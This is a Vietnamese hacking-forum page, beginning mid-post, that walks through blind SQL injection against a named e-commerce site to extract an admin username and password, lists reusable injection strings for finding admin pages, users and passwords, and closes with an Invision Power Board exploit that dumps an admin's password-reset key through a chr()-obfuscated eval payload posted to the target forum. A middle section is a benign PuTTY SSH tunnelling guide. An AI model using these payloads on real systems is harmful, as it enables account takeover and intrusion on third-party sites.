/shop/shopproductfeatures.asp, line 139 Ko có gì hết tiếp tục như thế hxxps://circleathletics.com/shop/shopaddtocart.asp?catalogid=6%20or%201=(sele ct%20f ldusername%20from%20tbluser%20where%20admintype='s uper'%20and%20left(fldusername,1)='c') Microsoft OLE DB Provider for SQL Server error '80040e07' Syntax error converting the varchar value 'circ54' to a column of data type int. /shop/shop$db.asp, line 409 Hiện luôn User ra luôn site này bị lỗi nặng nếu những site khác các bạn động não 1 tí như khi tìm link admin là ok hihi hxxps://circleathletics.com/shop/shopaddtocart.asp?catalogid=6%20or%201=(sele ct%20f ldusername%20from%20tbluser %20where%20admintype='super'%20and%20left(fldusern ame,2)='ab') đây là cách tìm ký tự thư 2 , thứ 3 thì them vào (fldusername,3)='abc') dậy đó dễ mà. Chúng ta đã có user admin ở trên rồi circ54 tìm pass của nó hxxps://circleathletics.com/shop/shopaddtocart.asp?catalogid=6%20or%201=(sele ct%20f ldpassword%20from%20tbluser%20where%20fldusername= 'circ54'%20and%20left(fldpassword,1)='a') Microsoft VBScript runtime error '800a000d' Type mismatch: 'clng' /shop/shopproductfeatures.asp, line 13 hxxps://circleathletics.com/shop/shopaddtocart.asp?catalogid=6%20or%201=(sele ct%20f ldpassword%20from%20tbluser%20where%20fldusername= 'circ54'%20and%20left(fldpassword,1)='2') Microsoft OLE DB Provider for SQL Server error '80040e07' Syntax error converting the varchar value '2005HCP' to a column of data type int. /shop/shop$db.asp, line 409 Vậy là đã hack được thằng này rồi hihi quá dễ phải không các bạn Hy vọng các bạn hiểu mình viết vụng lắm mong mọi người thông cảm Còn đây là 1 số tham khỏa them *************(*** Ti`m link admin *************************************** %20or%201=(select%20fieldname%20from%20configurati on%20where%20left(fieldname,10)='xadminpage'%20and %20left(fieldvalue,1)='a') <=== Doan ki tu dau %20or%201=(select%20fieldname%20from%20configurati on%20where%20left(fieldname,10)='xadminpage'%20and %20left(fieldvalue,1)='a'%20and%20len(fieldvalue)= 15) <=== Tim so ki tu . **************** Ti`m user *********************************************** or 1=(select fldusername from tbluser where admintype='super' and left(fldusername,1)='a') <== Ki tu dau or 1=(select fldusername from tbluser where admintype='super' and left(fldusername,2)='ab') <== Tim chu~ thu 2 - thu 3 thi the = so 3 va mo` tiep or 1=(select fldusername from tbluser where left(fldusername,1)='b' and len(fldusername)=3) <== So ki tu cua user or 1=(select fldusername from tbluser where left(fldusername,1)='a') When not superAdmin *************** Ti`m pass ************************************************ or 1=(select fldpassword from tbluser where fldusername='blue42jh' and left(fldpassword,1)='a') <== Ki tu dau or 1=(select fldpassword from tbluser where left(fldpassword,1)='b' and len(fldpassword)=3) <== So ki tu Sưu tầm! ^_^ Vns3curity(HCE) SSH tunnelling with Putty Here's a mini-howto on configuring Putty for SSH tunnelling. Let's say you have an account on a Linux box (with an IP address of 192.168.2.100) that you can SSH into. Let's say you want to connect to a Trac instance running on port 8000 on a different box (with IP 192.168.2.200), and you can't get directly to port 8000 on the second IP. You can still use your account on the first box and create an ssh tunnel that will allow you to get to port 8000 on IP #2. Howto What we'll do is forward port 9080 on the PC to 8000 on 192.168.2.200 (the host/port for Trac). I'm using Putty version 0.54. 1. Start Putty (so you're looking at the PuTTY Configuration screen.) 2. Enter 192.168.2.100 (the IP of the box you can ssh into) in the Host name / IP address box. 3. Check SSH as the protocol (port number should change to 22.) 4. Enter 'trac-tunnel' as the Saved Sessions name, and click Save. 5. Open the Connection list in the left pane. 6. Open the SSH list in the left pane, Click Tunnels. 7. Check X11 Forwarding (in case you need to run X-based applications.) 8. Back on the right side, at the bottom, enter 9080 for source port (there's nothing special about port 9080, it can be any non-used port on your local machine.) 9. Enter 192.168.2.200:8000 as the Destination, leave Local checked. 10. Click Add. 11. Important, easy to forget: Click Session on the left pane, Click Save. Now your 'trac-tunnel' session will not only connect you to the .100 box, but when you're logged into the .100, it will mediate a tunnel between your PC's port 9080 and port 8000 on 192.168.2.200. So, let's try it out: 1. Use Putty to open the 'trac-tunnel' connection, and log in as yourself 2. Point your browser to http://127.0.0.1:9080/ and you'll get right in. You'd repeat Steps 8-10 to add more local port forwardings. Step 11 is easy to forget, so be warned Longnhi(HCE) Anh Long post tiếng Anh thế nài, nếu có ai ko hiểu thì có thể làm như sau : 1/ vào tulnels, chọn dynamic, gõ vào source port ví dụ : 1293 <== mã số tình yêu của Navaro , rồi ADD 2/ vào session : điền vào account ssh , rồi load. Navaro(HCE) - Host Name (or IP address) 203.210.218.12 là địa chỉ public của remote server . - Port 22 là TCP Port của SSH tại tầng vận chuyển Tiếp theo hãy chọn mục Tunnels từ giao diện PuTTY để thiết lập SSH Tunnel theo các thông số như hình bên (nhớ chọn nút Add để ghi các tham số này vào khung Forwarded ports ) Source port là port của chương trình remote control đang lắng nghe trên máy được điều khiển (VNC dung port 5900, RAdmin: 4899). • Destination là địa chỉ remote server và port đang lắng nghe. Bây giờ ta đã có thể tiến hành công việc remote control vượt qua firewall dựa trên ssh tunneling , hãy nhấn Open để tạo kết nối ssh đến remote server và đăng nhập với tài khỏan hợp lệ. Sau khi quá trình đăng nhập hòan tất kiểm tra lại bằng lệnh netstat –na sẽ thấy TCP Port 4899 trên máy ở xa đã được map đến máy nội bộ: Tạo kết nối Remote Control bằng RAdmin client : Cuối cùng, hãy mở RAdmin client kết nối đến TCP Port 4899 của máy nội bộ (IP 127.0.0.1 ), WoW!, với tài khỏan hợp lệ là chúng ta đã có thể tương tác được với màn hình trên máy tính ở xa để tiến hành thao tác sửa chữa hay cài đặt thêm phần mềm mà không cần thay đổi policy của firewall. xfile.hacker(HCE) bàn thêm về bug search trong ipb :D Mọi người chắc ai cũng biết về cái bug từng làm mưa làm gió này , giờ tui chỉ thảo luận thêm tí về nó thui. Thực ra cái bug này dùng để chạy php code và nhiều exploiter đã lợi dụng nó để include shell , bây giờ nếu serv đó mình include shell không được thì sao , nó vẫn còn bug nhưng ko include shell được chẳng lẽ bó tay. Sao ko thử reset pass nhỉ Đầu tiên mọi người forgot pass thằng admin sau đó đem đoạn code sau convert ra rùi thay vào chỗ include( ) mà mọi người vẫn hay dùng. PHP Code: include('conf_global.php'); $fprefix = $INFO['sql_tbl_prefix']; echo "id,name,email,vid <br>"; $sql = "SELECT * FROM ".$fprefix."members, ".$fprefix."validating WHE RE ".$fprefix."members.id =1 and ".$fprefix."validating.member_id = 1"; $result = mysql_query($sql) or die(mysql_error()); while ($row = mysql_fetch_array($result)){ echo $row['id'].",".$row['name'].",".$row['email'].",".$row['vid']."<br>"; } echo "<noscript>"; Để ý thay số 1 bằng id của thằng admin, có cái vid rùi thì tiến hành reset pass thằng admin, nếu ai không biết cái làm thì coi lại cái bài d21-shoutbox , convert cái đống ở trên ta được như sau Code: chr(105).chr(110).chr(99).chr(108).chr(117).chr(100).chr(101).chr(40).chr(39).chr( 99).chr(111).chr(110).chr(102).chr(95).chr(103).chr(108).chr(111).chr(98).chr(97). chr(108).chr(46).chr(112).chr(104).chr(112).chr(39).chr(41).chr(59).chr(13).chr(10 ).chr(36).chr(102).chr(112).chr(114).chr(101).chr(102).chr(105).chr(120).chr(32).c hr(61).chr(32).chr(36).chr(73).chr(78).chr(70).chr(79).chr(91).chr(39).chr(115).chr (113).chr(108).chr(95).chr(116).chr(98).chr(108).chr(95).chr(112).chr(114).chr(10 1).chr(102).chr(105).chr(120).chr(39).chr(93).chr(59).chr(13).chr(10).chr(13).chr( 10).chr(101).chr(99).chr(104).chr(111).chr(32).chr(34).chr(105).chr(100).chr(44).c hr(110).chr(97).chr(109).chr(101).chr(44).chr(101).chr(109).chr(97).chr(105).chr(1 08).chr(44).chr(118).chr(105).chr(100).chr(32).chr(60).chr(98).chr(114).chr(62).ch r(34).chr(59).chr(13).chr(10).chr(36).chr(115).chr(113).chr(108).chr(32).chr(61).c hr(32).chr(34).chr(83).chr(69).chr(76).chr(69).chr(67).chr(84).chr(32).chr(42).chr( 32).chr(70).chr(82).chr(79).chr(77).chr(32).chr(34).chr(46).chr(36).chr(102).chr(1 12).chr(114).chr(101).chr(102).chr(105).chr(120).chr(46).chr(34).chr(109).chr(101 ).chr(109).chr(98).chr(101).chr(114).chr(115).chr(44).chr(32).chr(34).chr(46).chr( 36).chr(102).chr(112).chr(114).chr(101).chr(102).chr(105).chr(120).chr(46).chr(34 ).chr(118).chr(97).chr(108).chr(105).chr(100).chr(97).chr(116).chr(105).chr(110).c hr(103).chr(32).chr(87).chr(72).chr(69).chr(82).chr(69).chr(32).chr(34).chr(46).chr (36).chr(102).chr(112).chr(114).chr(101).chr(102).chr(105).chr(120).chr(46).chr(3 4).chr(109).chr(101).chr(109).chr(98).chr(101).chr(114).chr(115).chr(46).chr(105). chr(100).chr(32).chr(61).chr(49).chr(32).chr(97).chr(110).chr(100).chr(32).chr(34) .chr(46).chr(36).chr(102).chr(112).chr(114).chr(101).chr(102).chr(105).chr(120).c hr(46).chr(34).chr(118).chr(97).chr(108).chr(105).chr(100).chr(97).chr(116).chr(10 5).chr(110).chr(103).chr(46).chr(109).chr(101).chr(109).chr(98).chr(101).chr(114). chr(95).chr(105).chr(100).chr(32).chr(61).chr(32).chr(49).chr(34).chr(59).chr(13).c hr(10).chr(36).chr(114).chr(101).chr(115).chr(117).chr(108).chr(116).chr(32).chr(6 1).chr(32).chr(109).chr(121).chr(115).chr(113).chr(108).chr(95).chr(113).chr(117). chr(101).chr(114).chr(121).chr(40).chr(36).chr(115).chr(113).chr(108).chr(41).chr( 32).chr(111).chr(114).chr(32).chr(100).chr(105).chr(101).chr(40).chr(109).chr(121 ).chr(115).chr(113).chr(108).chr(95).chr(101).chr(114).chr(114).chr(111).chr(114). chr(40).chr(41).chr(41).chr(59).chr(13).chr(10).chr(119).chr(104).chr(105).chr(108 ).chr(101).chr(32).chr(40).chr(36).chr(114).chr(111).chr(119).chr(32).chr(61).chr( 32).chr(109).chr(121).chr(115).chr(113).chr(108).chr(95).chr(102).chr(101).chr(11 6).chr(99).chr(104).chr(95).chr(97).chr(114).chr(114).chr(97).chr(121).chr(40).chr (36).chr(114).chr(101).chr(115).chr(117).chr(108).chr(116).chr(41).chr(41).chr(12 3).chr(13).chr(10).chr(32).chr(32).chr(32).chr(32).chr(101).chr(99).chr(104).chr(1 11).chr(32).chr(36).chr(114).chr(111).chr(119).chr(91).chr(39).chr(105).chr(100).c hr(39).chr(93).chr(46).chr(34).chr(44).chr(34).chr(46).chr(36).chr(114).chr(111).c hr(119).chr(91).chr(39).chr(110).chr(97).chr(109).chr(101).chr(39).chr(93).chr(46) .chr(34).chr(44).chr(34).chr(46).chr(36).chr(114).chr(111).chr(119).chr(91).chr(39 ).chr(101).chr(109).chr(97).chr(105).chr(108).chr(39).chr(93).chr(46).chr(34).chr( 44).chr(34).chr(46).chr(36).chr(114).chr(111).chr(119).chr(91).chr(39).chr(118).ch r(105).chr(100).chr(39).chr(93).chr(46).chr(34).chr(60).chr(98).chr(114).chr(62).c hr(34).chr(59).chr(13).chr(10).chr(125).chr(13).chr(10).chr(101).chr(99).chr(104). chr(111).chr(32).chr(34).chr(60).chr(110).chr(111).chr(115).chr(99).chr(114).chr(1 05).chr(112).chr(116).chr(62).chr(34).chr(59) ta đem đoạn code sau post vào forum của nó Code: longnhieval(chr(105).chr(110).chr(99).chr(108).chr(117).chr(100).chr(101).chr(40) .chr(39).chr(99).chr(111).chr(110).chr(102).chr(95).chr(103).chr(108).chr(111).chr (98).chr(97).chr(108).chr(46).chr(112).chr(104).chr(112).chr(39).chr(41).chr(59).c hr(13).chr(10).chr(36).chr(102).chr(112).chr(114).chr(101).chr(102).chr(105).chr(1 20).chr(32).chr(61).chr(32).chr(36).chr(73).chr(78).chr(70).chr(79).chr(91).chr(39) .chr(115).chr(113).chr(108).chr(95).chr(116).chr(98).chr(108).chr(95).chr(112).chr (114).chr(101).chr(102).chr(105).chr(120).chr(39).chr(93).chr(59).chr(13).chr(10). chr(13).chr(10).chr(101).chr(99).chr(104).chr(111).chr(32).chr(34).chr(105).chr(10 0).chr(44).chr(110).chr(97).chr(109).chr(101).chr(44).chr(101).chr(109).chr(97).ch r(105).chr(108).chr(44).chr(118).chr(105).chr(100).chr(32).chr(60).chr(98).chr(114 ).chr(62).chr(34).chr(59).chr(13).chr(10).chr(36).chr(115).chr(113).chr(108).chr(3 2).chr(61).chr(32).chr(34).chr(83).chr(69).chr(76).chr(69).chr(67).chr(84).chr(32). chr(42).chr(32).chr(70).chr(82).chr(79).chr(77).chr(32).chr(34).chr(46).chr(36).chr (102).chr(112).chr(114).chr(101).chr(102).chr(105).chr(120).chr(46).chr(34).chr(1 09).chr(101).chr(109).chr(98).chr(101).chr(114).chr(115).chr(44).chr(32).chr(34).c hr(46).chr(36).chr(102).chr(112).chr(114).chr(101).chr(102).chr(105).chr(120).chr( 46).chr(34).chr(118).chr(97).chr(108).chr(105).chr(100).chr(97).chr(116).chr(105). chr(110).chr(103).chr(32).chr(87).chr(72).chr(69).chr(82).chr(69).chr(32).chr(34).c hr(46).chr(36).chr(102).chr(112).chr(114).chr(101).chr(102).chr(105).chr(120).chr( 46).chr(34).chr(109).chr(101).chr(109).chr(98).chr(101).chr(114).chr(115).chr(46). chr(105).chr(100).chr(32).chr(61).chr(49).chr(32).chr(97).chr(110).chr(100).chr(32 ).chr(34).chr(46).chr(36).chr(102).chr(112).chr(114).chr(101).chr(102).chr(105).ch r(120).chr(46).chr(34).chr(118).chr(97).chr(108).chr(105).chr(100).chr(97).chr(116 ).chr(105).chr(110).chr(103).chr(46).chr(109).chr(101).chr(109).chr(98).chr(101).c hr(114).chr(95).chr(105).chr(100).chr(32).chr(61).chr(32).chr(49).chr(34).chr(59). chr(13).chr(10).chr(36).chr(114).chr(101).chr(115).chr(117).chr(108).chr(116).chr( 32).chr(61).chr(32).chr(109).chr(121).chr(115).chr(113).chr(108).chr(95).chr(113). chr(117).chr(101).chr(114).chr(121).chr(40).chr(36).chr(115).chr(113).chr(108).ch r(41).chr(32).chr(111).chr(114).chr(32).chr(100).chr(105).chr(101).chr(40).chr(109 ).chr(121).chr(115).chr(113).chr(108).chr(95).chr(101).chr(114).chr(114).chr(111). chr(114).chr(40).chr(41).chr(41).chr(59).chr(13).chr(10).chr(119).chr(104).chr(105 ).chr(108).chr(101).chr(32).chr(40).chr(36).chr(114).chr(111).chr(119).chr(32).chr (61).chr(32).chr(109).chr(121).chr(115).chr(113).chr(108).chr(95).chr(102).chr(10 1).chr(116).chr(99).chr(104).chr(95).chr(97).chr(114).chr(114).chr(97).chr(121).ch r(40).chr(36).chr(114).chr(101).chr(115).chr(117).chr(108).chr(116).chr(41).chr(41 ).chr(123).chr(13).chr(10).chr(32).chr(32).chr(32).chr(32).chr(101).chr(99).chr(10 4).chr(111).chr(32).chr(36).chr(114).chr(111).chr(119).chr(91).chr(39).chr(105).ch r(100).chr(39).chr(93).chr(46).chr(34).chr(44).chr(34).chr(46).chr(36).chr(114).chr (111).chr(119).chr(91).chr(39).chr(110).chr(97).chr(109).chr(101).chr(39).chr(93). chr(46).chr(34).chr(44).chr(34).chr(46).chr(36).chr(114).chr(111).chr(119).chr(91) .chr(39).chr(101).chr(109).chr(97).chr(105).chr(108).chr(39).chr(93).chr(46).chr(3 4).chr(44).chr(34).chr(46).chr(36).chr(114).chr(111).chr(119).chr(91).chr(39).chr( 118).chr(105).chr(100).chr(39).chr(93).chr(46).chr(34).chr(60).chr(98).chr(114).ch r(62).chr(34).chr(59).chr(13).chr(10).chr(125).chr(13).chr(10).chr(101).chr(99).chr (104).chr(111).chr(32).chr(34).chr(60).chr(110).chr(111).chr(115).chr(99).chr(114) .chr(105).chr(112).chr(116).chr(62).chr(34).chr(59)); // . tác sửa chữa hay cài đặt thêm phần mềm mà không cần thay đổi policy của firewall. xfile .hacker( HCE) bàn thêm về bug search trong ipb :D Mọi người chắc ai cũng biết về cái bug từng